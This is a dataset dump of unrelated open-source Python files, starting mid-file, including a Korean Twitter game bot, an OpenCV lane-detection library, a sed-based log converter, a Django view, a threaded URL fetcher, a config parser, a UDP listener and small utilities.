print(module.__name__, module.version)\r\n versioned+=1\r\n except:\r\n print(module.__name__, \"does not have version info\" )\r\n\r\n print('\\n\\n',versioned, \"of\", len(allmodules), \\\r\n \"imported libraries provide '__version__' or 'version'\",\\\r\n f'\\n& {success} out of {count} lines imported from requirements')\r\n\r\nif __name__=='__main__':\r\n lines,imported = load_dependencies('requirements.txt')\r\n version_print(lines,imported)\r\n","repo_name":"chriswilly/kuramoto-osc","sub_path":"Python/kurosc/test_imports_version.py","file_name":"test_imports_version.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"32482087221","text":"import tweepy\nimport logging\nimport time\nimport Activities\nimport RWData\nimport random\n\nlogging.basicConfig(level=logging.INFO)\n\nCRYSTAL = 2\nSTAMINA = 3\nBAIT = 4\nEQUIPB = 5\nEQUIPC = 6\nGOLD = 7\n\ndef check_mentions(api, keywords, since_id, sheet_data):\n latest_id = since_id\n user_names = sheet_data['user_names'][0]\n for tweet in tweepy.Cursor(api.mentions_timeline,\n since_id=since_id).items():\n if (int(latest_id) <= tweet.id):\n latest_id = tweet.id\n task_name = \"\"\n\n if tweet.in_reply_to_status_id is not None:\n continue\n\n for keyword in keywords:\n if keyword in tweet.text.lower():\n task_name = keyword\n if task_name != \"\":\n print(f\"Answering to {tweet.user.name}\")\n print(tweet.id)\n # save replied tweet's id\n\n if task_name == \"오늘의운세\":\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.todays_fortune(),\n in_reply_to_status_id=tweet.id,\n )\n\n elif task_name == \"[낚시]\":\n print(\"낚시 시작\")\n has_enough_bait = Activities.check_user_status(user_names, tweet.user.name, BAIT, 1)\n if has_enough_bait is True:\n fish_result = Activities.activity_result(sheet_data, \"fish_data\")\n if fish_result[0] != \"\":\n api.update_with_media(fish_result[0],\n status=\"@%s\" 
% tweet.user.screen_name + fish_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + fish_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name\n + \"떡밥이 없거나 없는 유저명입니다. 상점에서 떡밥을 구입하거나 이름을 확인해주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[사냥]\":\n print(\"사냥 시작\")\n has_enough_stamina = Activities.check_user_status(user_names, tweet.user.name, STAMINA, 20)\n if has_enough_stamina is True:\n hunt_result = Activities.activity_result(sheet_data, \"hunt_data\")\n if hunt_result[0] != \"\":\n api.update_with_media(hunt_result[0],\n status=\"@%s\" % tweet.user.screen_name + hunt_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + hunt_result[1],\n in_reply_to_status_id=tweet.id,\n )\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name\n + \"스테미나가 부족하거나 없는 유저명입니다. 상점에서 회복약을 구입하거나 스테미나가 회복될 때까지 기다려주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[요리]\":\n print(\"요리 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.cooking(sheet_data),\n in_reply_to_status_id=tweet.id,\n )\n\n elif task_name == \"[장비뽑기]\":\n print(\"장비 뽑기 시작\")\n has_enough_crystal = Activities.check_user_status(user_names, tweet.user.name, CRYSTAL, 3000)\n if has_enough_crystal is True:\n\n # check the number of each rate of equipment and upload the image\n equip_list = Activities.generate_eqip_list(sheet_data, tweet.user.name)\n api.update_with_media(equip_list[4], \"@%s\" % tweet.user.screen_name,\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(5)\n # print B,C equipment\n comment = Activities.print_gotcha_result(sheet_data, \"equip_data\", equip_list, 3) + Activities.print_gotcha_result(\n sheet_data, \"equip_data\", equip_list, 2)\n for i in range(0, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n # print A,S equipment\n S_equip = Activities.print_S_equip(sheet_data, \"equip_data\", equip_list)\n comment = Activities.print_gotcha_result(sheet_data, \"equip_data\", equip_list, 1) + S_equip[1]\n if len(S_equip[0]) != 0:\n media_ids = []\n for filename in S_equip[0]:\n print(S_equip[0])\n res = api.media_upload(filename)\n media_ids.append(res.media_id)\n api.update_status(media_ids=media_ids, status=\"@%s\" % tweet.user.screen_name + comment[:139],\n in_reply_to_status_id=tweet.id,\n )\n if len(comment) > 139:\n for i in range(1, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(\n status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n else:\n if comment != \"\":\n for i in range(0, len(comment) // 139 + 1):\n if comment[i*139:(i + 1) * 139] != '\\n':\n api.update_status(\n status=\"@%s \" % tweet.user.screen_name + comment[i * 139: (i + 1) * 139],\n in_reply_to_status_id=tweet.id,\n )\n Activities.update_user_inven(user_names, tweet.user.name, equip_list)\n else:\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + \"없는 유저이거나 크리스탈이 부족합니다. 
가챠숍에서 크리스탈을 구매해주세요.\",\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n\n elif task_name == \"[하급장비판매]\":\n print(\"c등급 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, False, True),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[중급장비판매]\":\n print(\"b등급 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, True, False),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[일괄판매]\":\n print(\"일괄 판매 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.sell_equips(user_names, tweet.user.name, True, True),\n in_reply_to_status_id=tweet.id,\n )\n time.sleep(2)\n elif task_name == \"[tmi보기]\":\n print(\"tmi 출력 시작\")\n api.update_status(\n status=\"@%s\" % tweet.user.screen_name + Activities.random_feature(sheet_data, tweet.user.name),\n in_reply_to_status_id=tweet.id,\n )\n\n else:\n api.update_status(\n status=\"@%s 오류입니다. 해당 트윗과 봇에 보낸 트윗을 캡쳐해서 총괄계 디엠으로 보내주세요.\" % tweet.user.screen_name,\n in_reply_to_status_id=tweet.id,\n )\n\n RWData.update_file(\"replied_mention_ids.txt\", latest_id)\n return latest_id","repo_name":"jayin301/tweetbot_trpg","sub_path":"UpdateTweet.py","file_name":"UpdateTweet.py","file_ext":"py","file_size_in_byte":9225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"35864183779","text":"# Import dependencies\nimport numpy as np\nimport cv2\nimport pickle\n\n# Constants\n# Yellow and white color filter\nDARK_YELLOW = np.array([18, 94, 140])\nBRIGHT_YELLOW = np.array([48, 255, 255])\nDARK_WHITE = np.array([0, 0, 200])\nBRIGHT_WHITE = np.array([255, 255, 255])\n\n# Dilation and erosion, Gaussian blur kernel\nDILATE_ERODE_KERNEL = np.ones((5, 5))\nGAUSSIAN_BLUR_KERNEL = (5, 5)\n\n# Sliding window filter\nMIN_NUMBER_OF_PIXELS_PER_WINDOW = 1\nLEFT_LANE_COLOR = [255, 0, 100]\nRIGHT_LANE_COLOR = [0, 100, 255]\n\n# Image warp parameters\nWARP_POINTS = np.float32([(42 / 100, 63 / 100), (1 - (42 / 100), 63 / 100), (14 / 100, 87 / 100), (1 - (14 / 100), 87 / 100)])\nORIG_POINTS = np.float32([(0, 0), (1, 0), (0, 1), (1, 1)])\n\n\n# Undistort with calibration pickle file function\ndef undistort_with_cal_pickle_file(img, cal_dir):\n # Open pickle file\n with open(cal_dir, mode='rb') as f:\n file = pickle.load(f)\n # Load distortion parameters\n mtx = file['mtx']\n dist = file['dist']\n # Perform un-distortion\n dst = cv2.undistort(img, mtx, dist, None, mtx)\n # Return un-distorted image\n return dst\n\n\n# Color filter function\ndef apply_yellow_white_filter(img):\n # Convert image to HSV\n img_hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n # Keep white and yellow image parts\n img_masked_white, img_masked_yellow = cv2.inRange(img_hsv, DARK_WHITE, BRIGHT_WHITE), cv2.inRange(img_hsv, DARK_YELLOW, BRIGHT_YELLOW)\n # Unite images\n img_masked = cv2.bitwise_or(img_masked_white, img_masked_yellow)\n # Return image after union\n return img_masked\n\n\n# Run Canny edge detector in a color masked image function\ndef run_masked_canny_detector(img):\n # Convert image to grayscale\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n # Apply Gaussian blur filter and Canny edge detection\n img_blurred = cv2.GaussianBlur(img_gray, GAUSSIAN_BLUR_KERNEL, 0)\n img_canny = cv2.Canny(img_blurred, 50, 100)\n # Perform dialation and erosion\n img_dila = cv2.dilate(img_canny, DILATE_ERODE_KERNEL, iterations=1)\n 
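# dilation followed by erosion amounts to a morphological closing: it bridges\n # small gaps in the Canny edges before the color mask is OR-ed back in below\n 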
img_eros = cv2.erode(img_dila, DILATE_ERODE_KERNEL, iterations=1)\n # Apply yellow and white color filter\n img_masked = apply_yellow_white_filter(img)\n # Unite edge detection and color filter results\n img_masked_canny = cv2.bitwise_or(img_masked, img_eros)\n # Return united image, Canny detection results and color masked image\n return img_masked_canny, img_canny, img_masked\n\n\n# Perform image warp function \ndef perform_image_warp(img, dst_size, src, dst):\n # Get image size as float\n img_size = np.float32([(img.shape[1],img.shape[0])])\n # Multiply define source and destination points during image warp\n src = src * img_size\n dst = dst * np.float32(dst_size)\n # Determine perspective transformation matrix\n M_trans = cv2.getPerspectiveTransform(src, dst)\n # Perform perspective transformation\n img_warped = cv2.warpPerspective(img, M_trans, dst_size)\n # Return warped image\n return img_warped\n\n\n# Get image histogram function\ndef get_image_histogram(img):\n hist = np.sum(img[img.shape[0] // 2:, :], axis=0)\n return hist\n\n\n# Apply sliding window filter function\ndef apply_sliding_window_filter(img, n_windows=12, margin=144, draw_windows=True):\n # Prepare output image\n img_out = np.dstack((img, img, img)) * 255\n\n # Get image histogram - 0 if black and positive if bright color, e. g. yellow or white\n histogram = get_image_histogram(img)\n \n # find peaks of left and right halves\n histogram_midpoint = int(histogram.shape[0] / 2)\n # Find brightness maximum in left half of the histogram\n window_x_left = np.argmax(histogram[:histogram_midpoint])\n # Find brightness maximum in right half of the histogram\n window_x_right = np.argmax(histogram[histogram_midpoint:]) + histogram_midpoint\n # Current positions to be updated for each window\n window_x_left_current, window_x_right_current = window_x_left, window_x_right\n\n # Set height of windows depending on number of windows along image height (use the builtin int - np.int was removed in NumPy 1.24)\n window_height = int(img.shape[0] / n_windows)\n # Identify the x and y positions of all non-zero pixels in the image\n inds_nonzero = img.nonzero()\n inds_y_nonzero, inds_x_nonzero = np.array(inds_nonzero[0]), np.array(inds_nonzero[1])\n \n # Create empty lists to receive left and right lane pixel indices\n inds_left_lane, inds_right_lane = [], []\n # Step through the windows one by one\n for window in range(n_windows):\n # Identify window boundaries in x and y (and right and left) - according to window height and width (margin)\n win_y_low = img.shape[0] - (window + 1) * window_height\n win_y_high = img.shape[0] - window * window_height\n win_xleft_low = window_x_left_current - margin\n win_xleft_high = window_x_left_current + margin\n win_xright_low = window_x_right_current - margin\n win_xright_high = window_x_right_current + margin\n # Draw the windows on the visualization image\n if draw_windows:\n cv2.rectangle(img_out, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high),\n (100, 255, 255), 1)\n cv2.rectangle(img_out, (win_xright_low, win_y_low), (win_xright_high, win_y_high),\n (100, 255, 255), 1)\n # Identify the nonzero pixels in x and y within the window\n inds_left_nonzero = ((inds_y_nonzero >= win_y_low) & (inds_y_nonzero < win_y_high) &\n (inds_x_nonzero >= win_xleft_low) & (inds_x_nonzero < win_xleft_high)).nonzero()[0]\n inds_right_nonzero = ((inds_y_nonzero >= win_y_low) & (inds_y_nonzero < win_y_high) &\n (inds_x_nonzero >= win_xright_low) & (inds_x_nonzero < win_xright_high)).nonzero()[0]\n # Re-center next window along mean of pixel indices within current window\n if len(inds_left_nonzero) > MIN_NUMBER_OF_PIXELS_PER_WINDOW:\n window_x_left_current = int(np.mean(inds_x_nonzero[inds_left_nonzero]))\n if len(inds_right_nonzero) > MIN_NUMBER_OF_PIXELS_PER_WINDOW:\n window_x_right_current = int(np.mean(inds_x_nonzero[inds_right_nonzero]))\n # Append left and right lane points to the list\n inds_left_lane.append(inds_left_nonzero)\n inds_right_lane.append(inds_right_nonzero)\n \n # Keep the non-empty index arrays as plain lists before concatenating - np.array() on a ragged sequence raises an error on modern NumPy\n inds_left_lane = [lane_data for lane_data in inds_left_lane if lane_data.any()]\n inds_right_lane = [lane_data for lane_data in inds_right_lane if lane_data.any()]\n if len(inds_left_lane) == 0 or len(inds_right_lane) == 0:\n return img, None, None\n inds_left_lane, inds_right_lane = np.concatenate(inds_left_lane), np.concatenate(inds_right_lane)\n\n # Get left and right line pixel positions as arrays of points\n points_x_left, points_y_left = inds_x_nonzero[inds_left_lane], inds_y_nonzero[inds_left_lane]\n points_x_right, points_y_right = inds_x_nonzero[inds_right_lane], inds_y_nonzero[inds_right_lane]\n\n # If both left and right x coordinate point arrays hold points, perform polynomial fit\n if points_x_left.size and points_x_right.size:\n # Fit a second order polynomial to left and right lane point sets\n left_fit = np.polyfit(points_y_left, points_x_left, 2)\n right_fit = np.polyfit(points_y_right, points_x_right, 2)\n\n # Get polynomial parameters for left and right lane\n left_a, left_b, left_c, right_a, right_b, right_c = [], [], [], [], [], []\n left_a.append(left_fit[0])\n left_b.append(left_fit[1])\n left_c.append(left_fit[2])\n right_a.append(right_fit[0])\n right_b.append(right_fit[1])\n right_c.append(right_fit[2])\n \n # Use average parameters for actual left and right lane fit\n left_fit, right_fit = np.empty(3), np.empty(3)\n left_fit[0], left_fit[1], left_fit[2] = np.mean(left_a[-10:]), np.mean(left_b[-10:]), np.mean(left_c[-10:])\n right_fit[0], right_fit[1], right_fit[2] = np.mean(right_a[-10:]), np.mean(right_b[-10:]), np.mean(right_c[-10:])\n\n # Generate x and y values from image shape to plot points along polynomial fit\n point_range = np.linspace(0, img.shape[0] - 1, img.shape[0])\n left_fit_x = left_fit[0] * point_range ** 2 + left_fit[1] * point_range + left_fit[2]\n right_fit_x = right_fit[0] * point_range ** 2 + right_fit[1] * point_range + right_fit[2]\n\n # Colorize polynomial lane fit results in output image\n img_out[inds_y_nonzero[inds_left_lane], inds_x_nonzero[inds_left_lane]] = LEFT_LANE_COLOR\n img_out[inds_y_nonzero[inds_right_lane], inds_x_nonzero[inds_right_lane]] = RIGHT_LANE_COLOR\n\n # Return output image and both lane fit points in x and y as well as range of points along fit\n return img_out, (left_fit_x, right_fit_x), point_range\n # If no lanes were found, return original image\n else:\n # Return original image\n return img, None, None\n\n\n# Draw lanes function\ndef draw_lanes(img, left_fit, right_fit, frame_width, frame_height, src):\n # Define point range along image shape\n point_range = np.linspace(0, img.shape[0] - 1, img.shape[0])\n # Prepare output image\n img_color = np.zeros_like(img)\n # Process points for poly fill\n left_points = np.array([np.transpose(np.vstack([left_fit, point_range]))])\n right_points = np.array([np.flipud(np.transpose(np.vstack([right_fit, point_range])))])\n points = np.hstack((left_points, right_points))\n # Draw lanes as polygons\n cv2.fillPoly(img_color, np.int_(points), (100 , 255, 0))\n # Re-warp image\n 
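# src and dst are passed in the reverse order of the earlier forward warp, so this appears to project the bird's-eye lane polygon back into the original camera perspective\n 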
img_color = perform_image_warp(img_color, dst_size=(frame_width, frame_height), src=ORIG_POINTS, dst=WARP_POINTS)\n # Add original image and colorized lanes\n img_color = cv2.addWeighted(img, 0.5, img_color, 0.7, 0)\n # Return image with colorized lanes\n return img_color","repo_name":"codeXing8/LaneRecognition","sub_path":"warped-window-polyfit2D/warped_window_polyfit2D_lib.py","file_name":"warped_window_polyfit2D_lib.py","file_ext":"py","file_size_in_byte":9962,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"73819291945","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\nimport subprocess\nimport tempfile\n\nimport pandas as pd\nfrom tqdm import tqdm\n\nfrom logger import log\n\n\nclass ConvertParams:\n def __init__(self):\n self.log_path = None # type: str\n self.script_path = None # type: str\n self.file = None # type: str\n\n\nclass Column:\n \"\"\"\n Csv column definitions.\n \"\"\"\n ADDR = 'addr' # type: str\n CMD = 'cmd' # type: str\n FLAGS = 'flags' # type: str\n\n\nclass Flag:\n \"\"\"\n Csv flag definitions.\n \"\"\"\n #: Uses regular expression to ADDR.\n REGEX = \"regex\" # type: str\n\n\nclass Converter:\n DIR_SUFFIX = \".conv\" # type: str\n SED_ADD_FMT = \"/%s/ s/$/%s/\\n\" # type: str\n SED_CMD_FMT = \"sed -r -f %s \\\"%s\\\" > \\\"%s\\\"\" # type: str\n ESCAPE_CAR = ['\\\\', '/', '*', '.', '+', '?', '|', '{', '}', '(', ')', '[', ']', '^', '$'] # type: list of str\n SED_REPLACES = list(zip(ESCAPE_CAR, ['\\\\' + x for x in ESCAPE_CAR])) # type: list of touple\n\n def __init__(self, params: ConvertParams):\n self.__p = params\n self.__tar_dir = None # type: str\n\n def exec(self):\n \"\"\"\n Execute conversion.\n :return (Result, Output directory if exists.)\n :rtype (bool, str)\n \"\"\"\n if not self.__is_files_exists():\n return False, None\n\n sc = self.__csv_to_sed_script()\n\n out_dir = None\n if self.__p.file is None:\n self.__un_tar()\n out_dir = self.__exec_convert_tar(sc)\n else:\n self.__exec_convert(sc)\n os.unlink(sc) # remote temp file\n\n return True, out_dir\n\n def __is_files_exists(self):\n \"\"\"\n Checks required files exists.\n :return: True: All file exists. 
False: Not exists.\n :rtype bool\n \"\"\"\n if (not self.__p.log_path is None) and (not os.path.exists(self.__p.log_path)):\n log.w(\"- not found: %s\" % self.__p.log_path)\n return False\n if (not self.__p.file is None) and (not os.path.exists(self.__p.file)):\n log.w(\"- not found: %s\" % self.__p.file)\n return False\n if not os.path.exists(self.__p.script_path):\n log.w(\"- not found: %s\" % self.__p.script_path)\n return False\n\n return True\n\n def __exec_convert(self, script_path):\n \"\"\"\n Execute conversion using `sed` command.\n :param str script_path: Script file path, which is used by `sed` command.\n \"\"\"\n # execute conversion\n f = os.path.splitext(self.__p.file)\n dp = f[0] + Converter.DIR_SUFFIX + f[1]\n log.i(\"- convert: %s\" % dp)\n self.__call(Converter.SED_CMD_FMT % (script_path, self.__p.file, dp))\n\n def __exec_convert_tar(self, script_path):\n \"\"\"\n Execute conversion a tar file.\n :param str script_path: Script file path, which will be used by `sed` command.\n :return Output directory\n :rtype str\n \"\"\"\n out_dir = self.__tar_dir + Converter.DIR_SUFFIX\n for d, f in tqdm(list(self.__files())):\n # create output directory.\n dist = os.path.join(out_dir, d)\n if not os.path.exists(dist):\n os.makedirs(dist)\n\n # execute conversion\n sp = os.path.join(self.__tar_dir, d, f)\n dp = os.path.join(dist, f)\n log.d(\"- convert: %s\" % dp)\n self.__call(Converter.SED_CMD_FMT % (script_path, sp, dp))\n\n return out_dir\n\n def __un_tar(self):\n \"\"\"\n Extract a __p.log_path tar file.\n \"\"\"\n self.__tar_dir = os.path.splitext(self.__p.log_path)[0]\n if not os.path.exists(self.__tar_dir):\n os.makedirs(self.__tar_dir)\n self.__call(\"tar xf %s -C %s\" % (self.__p.log_path, self.__tar_dir))\n\n def __call(self, cmd):\n \"\"\"\n Execute a command.\n :param str cmd: Command string.\n :return: Return code of the command.\n :rtype int\n \"\"\"\n log.d(\" > %s\" % cmd)\n return subprocess.call(cmd, shell=True)\n\n def __files(self):\n \"\"\"\n Find files.\n :return: Iterator[str]\n \"\"\"\n for root, dirs, files in os.walk(self.__tar_dir):\n d = root[len(self.__tar_dir) + 1:]\n for file in files:\n yield (d, file)\n\n def __csv_to_sed_script(self):\n \"\"\"\n Generate sed script from csv file.\n :return: File path name.\n :rtype str\n \"\"\"\n df = pd.read_csv(self.__p.script_path,\n names=[Column.ADDR, Column.CMD, Column.FLAGS]) # type: pandas.core.frame.DataFrame\n if df.flags.count() > 0:\n df.addr = df.apply(self.__convert_addr, axis=1)\n else:\n df.addr = df.addr.apply(self.__escape_sed_addr)\n\n with tempfile.NamedTemporaryFile(mode='w+t', delete=False) as tf:\n for i, r in df.iterrows():\n tf.write(Converter.SED_ADD_FMT % (r.addr, r.cmd))\n return tf.name\n\n # remain script file for debug.\n # f = \"tests/test.sed\"\n # with open(f, \"w\") as fd:\n # for i, r in df.iterrows():\n # fd.write(Converter.SED_ADD_FMT % (addr[i], r[1]))\n # return f\n\n def __convert_addr(self, row):\n \"\"\"\n Convert addr according to flags.\n :param pandas.Series row:\n :return: Converted addr.\n :rtype str\n \"\"\"\n if type(row[Column.FLAGS]) == str and Flag.REGEX in row[Column.FLAGS]:\n return row.addr\n else:\n return self.__escape_sed_addr(row.addr)\n\n def __escape_sed_addr(self, address):\n \"\"\"\n Escape sed address string.\n :param str address: Address string which is escaped.\n :return: Escaped string.\n :rtype str\n \"\"\"\n for c, r in Converter.SED_REPLACES:\n address = address.replace(c, r)\n return 
address\n","repo_name":"ujiro99/auto_logger","sub_path":"logger/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32312590227","text":"from django.forms import forms\r\nfrom django.http import request\r\nfrom django.views.generic import TemplateView\r\nfrom .scrape import getPrices\r\nfrom django.shortcuts import render\r\nfrom .form import ProductView\r\n\r\n\r\n\r\ndef home_view(request, *args, **kwargs):\r\n print(args, kwargs)\r\n print(request.user)\r\n forms= ProductView()\r\n return render(request, \"index.html\", {\r\n 'form' : forms\r\n })\r\n\r\n#def product_view(request, *args, **kwargs):\r\n # my_context ={\r\n # getPrices()\r\n # }\r\n # return getPrices(request,\"index.html\", my_context)\r\n\r\ndef show_result(request):\r\n if request.method=='POST':\r\n forms= ProductView(request.POST)\r\n if forms.is_valid():\r\n results = getPrices()\r\n \r\n return render(request, 'result.html', {\r\n 'results' : results\r\n })\r\n else:\r\n forms= ProductView()\r\n return render(request, 'index.html',{\r\n 'form': forms\r\n })\r\n\r\n \r\n\r\n\r\n","repo_name":"Humaira1227/cse470-file","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"41034396057","text":"import concurrent.futures as fut\nfrom urllib.request import urlopen\nimport time\n\nlinks = open('urls.txt', encoding='utf8').read().split('\\n')\n\n\ndef load_url(url, timeout):\n with urlopen(url, timeout=timeout) as conn:\n return conn.read()\n\nstart = time.time()\nwith fut.ThreadPoolExecutor(max_workers=100) as executor:\n future_to_url = dict()\n\n for url in links:\n future_to_url[executor.submit(load_url, url, 20)] = url\n\n for future in fut.as_completed(future_to_url):\n url = future_to_url[future]\n try:\n data=future.result()\n except Exception as exception:\n print(url,\" generated an exception\", exception)\n else:\n print(f\"{url} - {len(data)}\")\n\nprint(time.time()-start)","repo_name":"Pasha62/multi-task-at-19","sub_path":"io_bound.py","file_name":"io_bound.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"36"} +{"seq_id":"43666547602","text":"import os\n\n\nbuild_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nhome_path = os.path.dirname(build_dir)\nconfig_dir = os.path.join(home_path,'config.xml')\nkbuild_path = '%s/cmake/common/build_auxiliary_script' % home_path\n\ncpus_ = {'all': ['clean', 'm4'],\n 'clean':['clean'],\n 'm4': ['m4']\n }\n\ncpu_plat = {'m4': ['cortex']\n }\n","repo_name":"laiyoufafa/kernel_uniproton","sub_path":"build/uniproton_ci_lib/globle.py","file_name":"globle.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"21920248598","text":"# coding=utf-8\n\n\nimport os\nimport re\n\n\ndefault_golem_conf = '''\n[golem]\nname:\n[user]\nname:\n[books]\nlibro primero: test\n'''\ngolemfile_path = os.path.join(os.path.expanduser('~'), \"golem.txt\")\nif not os.path.exists(default_golem_conf):\n with open(golemfile_path, \"w+\") as f:\n f.write(default_golem_conf)\n\n\nclass Golem(object):\n def __init__(self):\n with open(golemfile_path, \"r\") as f:\n config = f.read()\n self.info = ConfigParser(config, ['golem', 'books', 
'user'])\n self.id = self.info.golem\n self.books = self.info.books\n self.user = self.info.user\n\n\nclass ConfigParser(object):\n def __init__(self, text, allowed_fields=None):\n self._sections = {}\n self._allowed_fields = allowed_fields or []\n pattern = re.compile(\"^\\[([a-z_]{2,50})\\]\")\n current_lines = []\n for line in text.splitlines():\n line = line.strip()\n if not line or line[0] == '#':\n continue\n m = pattern.match(line)\n if m:\n group = m.group(1)\n if self._allowed_fields and group not in self._allowed_fields:\n raise ParserException(\"ConfigParser: Unrecognized field '%s'\" % group)\n current_lines = []\n self._sections[group] = current_lines\n else:\n current_lines.append(line)\n for key, value in self._sections.iteritems():\n self._sections[key] = ConfigSection(key, \"\\n\".join(value))\n\n def __getattr__(self, name):\n if name in self._sections:\n return self._sections[name]\n else:\n if self._allowed_fields and name in self._allowed_fields:\n return \"\"\n else:\n raise ParserException(\"ConfigParser: Unrecognized field '%s'\" % name)\n\n def __repr__(self):\n rep = []\n for key, value in self._sections.iteritems():\n rep.append('[' + key + ']')\n rep.append(value.__repr__())\n return '\\n'.join(rep)\n\n\nclass ConfigSection(object):\n\n def __init__(self, section, text):\n self.section = section\n self._sections = {}\n for line in text.splitlines():\n key, value = line.split(':', 1)\n value = value.replace(' ', '') if value.startswith(' ') else value\n self._sections['_'.join(key.split(' '))] = value\n\n def __getattr__(self, key):\n if key in self._sections:\n return self._sections[key]\n return None\n\n def __repr__(self):\n rep = []\n for key, value in self._sections.iteritems():\n rep.append(key + ': ' + value)\n rep = '\\n'.join(rep)\n return rep\n\n\nclass ParserException(Exception):\n pass\n","repo_name":"bqlabs/golem","sub_path":"golem/core/golem.py","file_name":"golem.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30810881589","text":"#!/usr/bin/env python\n\nimport socket\nimport struct\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n\ns.bind(('192.168.1.200', 12345))\n\nwhile True:\n message, sender = s.recvfrom(4096)\n if len(message) == 16:\n color = struct.unpack(\"4f\", message)\n print(color, sender, len(message))\n if len(message) == 4:\n command = struct.unpack(\"f\",message)\n print(command, sender, len(message))\n if message == b'quit':\n break\n","repo_name":"AssoAndrea/UE-ArduinoLightController","sub_path":"PythonMiddleware/test_UDPserver.py","file_name":"test_UDPserver.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"25374682202","text":"def contador_vogais(texto: str):\n vogais = ['a', 'e', 'i', 'o', 'u']\n contador = 0\n\n for letra in texto.lower():\n if letra in vogais:\n contador += 1\n \n return contador\n\ntotal = contador_vogais('Eduardo Mendes')\nprint(f'Total = {total}')\n\n","repo_name":"ProfessorDudarts/Unasp-HT-2023.2","sub_path":"algoritmos_II/lista_funcoes/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":271,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"30637914521","text":"#!/usr/bin/python\n\n\ndef param_gui(self):\n \n param_gui = [\n self.K1, self.P1, self.e1, self.om1, self.ma1, self.incl1, 
self.Omega1,\n self.K2, self.P2, self.e2, self.om2, self.ma2, self.incl2, self.Omega2,\n self.K3, self.P3, self.e3, self.om3, self.ma3, self.incl3, self.Omega3,\n self.K4, self.P4, self.e4, self.om4, self.ma4, self.incl4, self.Omega4, \n self.K5, self.P5, self.e5, self.om5, self.ma5, self.incl5, self.Omega5,\n self.K6, self.P6, self.e6, self.om6, self.ma6, self.incl6, self.Omega6,\n self.K7, self.P7, self.e7, self.om7, self.ma7, self.incl7, self.Omega7, \n self.K8, self.P8, self.e8, self.om8, self.ma8, self.incl8, self.Omega8,\n self.K9, self.P9, self.e9, self.om9, self.ma9, self.incl9, self.Omega9,\n ]\n\n return param_gui\n\ndef param_errors_gui(self):\n\n param_errors_gui = [self.err_K1,self.err_P1,self.err_e1,self.err_om1,self.err_ma1, self.err_i1, self.err_Om1,\n self.err_K2,self.err_P2,self.err_e2,self.err_om2,self.err_ma2, self.err_i2, self.err_Om2,\n self.err_K3,self.err_P3,self.err_e3,self.err_om3,self.err_ma3, self.err_i3, self.err_Om3,\n self.err_K4,self.err_P4,self.err_e4,self.err_om4,self.err_ma4, self.err_i4, self.err_Om4, \n self.err_K5,self.err_P5,self.err_e5,self.err_om5,self.err_ma5, self.err_i5, self.err_Om5,\n self.err_K6,self.err_P6,self.err_e6,self.err_om6,self.err_ma6, self.err_i6, self.err_Om6,\n self.err_K7,self.err_P7,self.err_e7,self.err_om7,self.err_ma7, self.err_i7, self.err_Om7, \n self.err_K8,self.err_P8,self.err_e8,self.err_om8,self.err_ma8, self.err_i8, self.err_Om8,\n self.err_K9,self.err_P9,self.err_e9,self.err_om9,self.err_ma9, 